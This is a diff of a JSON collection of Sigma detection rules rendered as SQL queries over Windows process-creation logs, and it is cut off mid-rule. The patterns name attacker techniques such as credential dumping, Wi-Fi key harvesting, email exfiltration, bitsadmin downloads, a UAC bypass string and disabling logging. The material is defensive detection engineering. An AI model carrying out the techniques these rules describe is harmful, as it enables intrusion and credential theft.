"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", 
+ "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE 
'%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE 
'\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "SC.EXE Query Execution", - "id": "57712d7a-679c-4a41-a913-87e7175ae429", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1007" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID", - "Keybase process \"kbfsdokan.exe\" query the dokan1 service with the following commandline \"sc query dokan1\"" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND OriginalFileName LIKE '%sc.exe' ESCAPE '\\' AND CommandLine LIKE '% query%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND 
CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_query.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", - "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE 
'\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], + "falsepositives": [ + "Other programs that cause these patterns (please report)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + }, + { + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": 
"proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml" + }, + { + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the 
compatibility tab)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ + "attack.command_and_control", + "attack.t1105", "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", 
"attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "status": "test", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hktl_pypykatz.yml" + }, + { + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND 